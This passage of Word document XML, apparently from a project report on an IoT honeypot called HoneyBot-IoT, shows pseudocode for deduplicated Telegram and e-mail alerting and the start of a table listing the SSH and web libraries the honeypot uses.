              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Telegram and e-mail messages; one alerts row per decision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="55E31788" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> notify(dets):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> d </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> dets sorted by severity descending </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// strongest first</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> type disabled </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> severity(d) &lt; min_severity(type) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">continue</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4:          last ← highest severity already alerted </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> d.ip </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> last 10 min</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> last exists </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> severity(d) ≤ last </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6:              record(d, channel = dedupe, status = suppressed);  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">continue</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end if</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8:          text ← format(d, GeoIP city, MITRE techniques)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> last exists </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> text ← "ESCALATION" + text</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10:         record(d, telegram, send_telegram(text))      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// sent | failed | disabled</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">11:         record(d, email, send_email(html(d), text))    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// STARTTLS on port 587</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">12:         UPDATE detections SET alerted = TRUE WHERE id = d.id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9026" w:name="_Toc69026"/>
      <w:r>
        <w:t xml:space="preserve">7.2 External APIs / SDKs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9026"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following table documents the third-party libraries, frameworks, services and SDKs used by the 70% implementation, with the exact versions pinned in requirements-*.txt and docker-compose.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: External APIs and SDKs Used in HoneyBot-IoT</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688"/>
        <w:gridCol w:w="1670"/>
        <w:gridCol w:w="2016"/>
        <w:gridCol w:w="3986"/>
      </w:tblGrid>
      <w:tr w:rsidR="00240A5B" w14:paraId="7F879FCB" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="735219C0" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Name &amp; Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1670" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2FB2CA78" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="790E30D6" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Purpose of Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30747A61" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Module / Function / Class Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Paramiko 3.4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH v2 server for the Smart Lock: host key, password auth, shell and exec channels, port-forward requests.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">paramiko.ServerInterface, Transport, RSAKey, check_channel_exec_request()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">FastAPI 0.110.0 + Uvicorn 0.29.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Web framework / ASGI server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Three HTTP honeypot apps (camera, lock, sensor), the HTTPS panel and the REST API of the dashboard.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
